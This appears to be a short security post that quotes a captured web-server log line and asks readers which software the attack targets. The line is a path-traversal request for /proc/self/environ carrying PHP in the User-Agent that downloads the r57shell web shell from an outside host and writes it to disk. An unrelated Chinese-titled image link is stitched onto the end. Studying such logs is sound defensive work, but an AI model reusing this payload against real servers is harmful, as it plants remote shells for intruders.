Lately I started to see a few web-based attacks with a php script inside the user agent. Something like this:
a.b.229.82 - - [19/Jan/2010:22:43:39 -0700] "GET /index.php?page=../../../../../../../../../../../../../../../../../../../../../../../../.. /../../proc/self/environ HTTP/1.1" 200 3820 "-" "< ? echo '_rce_';echo php_uname();echo '_rce_';$ch=curl_init();curl_setopt($ch, CURLOPT_URL, 'http://websalesusa.com/ken');curl_setopt($ ch, CURLOPT_CONNECTTIMEOUT, 15);curl_setopt($ch, CURLOPT_TIMEOUT, 15);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$cont=curl_exec($ch); curl_close($ch);$fh=fopen('doc.php', 'w' );fwrite($fh, $cont);fclose($fh); ?> "
So, inside the user agent it is starting a PHP script that tries to download the file http://websalesusa.com/ken, which is the r57shell.php.
My guess is that it is trying to exploit a web stats or log analysis tool (like webalizer, google analytics, ossec, etc), but I couldn't find which one is vulnerable to that. Any ideas?
![Shell程式設計——sort排序、uniq忽略重複、tr替換壓縮删除、cut指定删除字段、正規表達式元字元sort 指令uniq 指令tr 指令cut 指令正規表達式[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)